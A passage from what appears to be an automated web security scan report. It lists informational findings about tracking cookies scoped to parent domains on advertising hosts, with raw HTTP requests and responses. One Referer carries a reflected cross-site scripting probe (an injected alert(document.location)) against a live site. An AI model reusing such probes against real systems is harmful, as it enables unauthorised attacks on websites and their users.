Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(document.location)//43d7466ae8e Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:03:43 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 16:03:43 GMT Last-Modified: Wed, 07 Sep 2011 16:03:43 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E66445F-60B9-40E5F551" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www368 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.42. http://p.brilig.com/contact/bct
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://p.brilig.com
Path:
/contact/bct
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Thu, 29-Aug-2041 15:00:30 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contact/bct?pid=d6b47090-0a45-4cd9-8cf9-d1081a8879d8&_ct=pixel&REDIR=rt.legolas-media.com/lgrt?ci=1%26ti=12%26sti=28%26sts=1315321126439961%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1 Host: p.brilig.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:00:30 GMT Server: Apache/2.2.14 (Ubuntu) Pragma: no-cache Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Expires: Mon, 19 Dec 1983 15:00:30 GMTSet-Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Thu, 29-Aug-2041 15:00:30 GMT Location: http://rt.legolas-media.com/lgrt?ci=1&ti=12&sti=28&sts=1315321126439961&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 Content-Length: 0 X-Brilig-D: D=3410 P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM" Connection: close Content-Type: text/plain
12.43. http://pi.pardot.com/analytics
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pi.pardot.com
Path:
/analytics
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:pi_opt_in1852=3c12a2182101972e2629218d; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /analytics?ver=3&visitor_id=191471185&pi_opt_in=&campaign_id=1407&account_id=2852&title=Ecommerce%20Storefront%20Software%20%7C%20Online%20Storefront%20Software&browser=Chrome&browser_version=13&operating_system=Windows&language=en-US&screen_height=1200&screen_width=1920&flash=true&java=true&url=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Ffeature.aspx&referrer=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Fdefault.aspx%3Fpi_ad_id%3D7270542494%26gclid%3DCLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1 Host: pi.pardot.com Proxy-Connection: keep-alive Referer: http://www.znode.com/znode-multifront/feature.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: visitor_id3682=160859557; pardot=h5gc13lruog4br7fbhilcbhh31; visitor_id1852=191471185
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:33:53 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3p: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml" Vary: Accept-Encoding,User-Agent Content-Length: 680 Content-Type: text/javascript; charset=utf-8Set-Cookie: pi_opt_in1852=3c12a2182101972e2629218d; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com Set-Cookie: visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com Set-Cookie: lpv1852=aHR0cDovL3d3dy56bm9kZS5jb20vem5vZGUtbXVsdGlmcm9udC9mZWF0dXJlLmFzcHg=; expires=Tue, 06-Sep-2011 16:03:53 GMT; path=/; secure X-Pardot-LB: lb-d2 Connection: close function piResponse() { piSetCookie('visitor_id1852', '191471275', 3650); if (document.location.protocol != "https:") { var analytics_link = "http://" + "www2.znode.com/analytics?"; pi.tracker.visitor...[SNIP]...
12.44. http://ping.crowdscience.com/ping.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ping.crowdscience.com
Path:
/ping.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:__csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1 Host: ping.crowdscience.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:56 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2Set-Cookie: __csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/ Content-Length: 8286 P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml" Connection: close Content-Type: text/plain (function (){ var cs = CrowdScience; cs.state = 1; // cs.states.ping_loading; cs.invitation_beforeShow = function() {}; cs.invitation_afterShow = function() {}; cs.i...[SNIP]...
12.45. http://pixel.fetchback.com/serve/fb/pdc
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pixel.fetchback.com
Path:
/serve/fb/pdc
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1 Host: pixel.fetchback.com Proxy-Connection: keep-alive Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: opt=1
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:28 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 15:32:28 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40 <!-- opt out exists or ip filtered -->
12.46. http://pixel.quantserve.com/pixel
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pixel.quantserve.com
Path:
/pixel
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:d=EKwBGAHSB7vRG9iBDYQh8Q; expires=Mon, 05-Dec-2011 15:00:28 GMT; path=/; domain=.quantserve.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=1150096029;fpan=1;fpa=P0-1990433296-1315339228713;ns=0;url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1315339228711;tzo=300;a=p-9eJ8k4iSzux46;labels=CNBC.Section.search%2CCNBC.Sub%20Section.Search%7CAll HTTP/1.1 Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EF8BHwHSB4EQCa0QvYgQAshAHxA
Response
HTTP/1.1 204 No Content Connection: closeSet-Cookie: d=EKwBGAHSB7vRG9iBDYQh8Q; expires=Mon, 05-Dec-2011 15:00:28 GMT; path=/; domain=.quantserve.com Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Date: Tue, 06 Sep 2011 15:00:28 GMT Server: QS
12.47. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://public.deloitte.com
Path:
/media/00Global/social_links/dtt_email_16x16.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.deloitte.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/00Global/social_links/dtt_email_16x16.gif HTTP/1.1 Host: public.deloitte.com Proxy-Connection: keep-alive Referer: http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=56; SC_LINKS=us%3Asearch%5E%5ETalent%5E%5Eus%3Asearch%20%7C%20Talent%5E%5E; s_nr=1315345935038-Repeat; s_vnum=1747342618651%26vn%3D2; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FServices%25252Fadditional-services%25252Ftalent-human-capital-hr%25252FTalent_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 16:52:17 GMTSet-Cookie: SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.deloitte.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Date: Tue, 06 Sep 2011 16:52:17 GMT Content-Type: image/gif Accept-Ranges: bytes Last-Modified: Thu, 06 Aug 2009 16:11:30 GMT ETag: "4090ff8eb016ca1:926" Content-Length: 405 GIF89a........................(........x........K........\...........Z.....$..%..E....p..... ..'.....P.................x..H...............................................................................[SNIP]...
12.48. http://r.openx.net/img
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r.openx.net
Path:
/img
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Thu, 05-Sep-2013 15:32:13 GMT; path=/; domain=.openx.net The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /img?pixel_id=52bb1d64d5b1cddb69e55780dd37f64a HTTP/1.1 Host: r.openx.net Proxy-Connection: keep-alive Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: p=1315103289; i=d2a43928-76cd-49ea-b899-b41fb371435f
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:13 GMT Server: Apache Cache-Control: public, max-age=30, proxy-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache P3P: CP="CUR ADM OUR NOR STA NID"Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Thu, 05-Sep-2013 15:32:13 GMT; path=/; domain=.openx.net Content-Length: 43 Connection: close Content-Type: image/gif GIF89a.............!.......,...........D..;
12.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:36:31 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:36:31 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1...[SNIP]...
12.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342006119&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1069543.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:46:48 GMT Content-Type: application/x-javascript; charset=utf-8 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 15:46:48 GMT Content-Length: 996 Connection: closeSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001069543/cstr=12485207=_4e664067,866585...[SNIP]...
12.51. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 16:07:26 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 16:07:26 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" 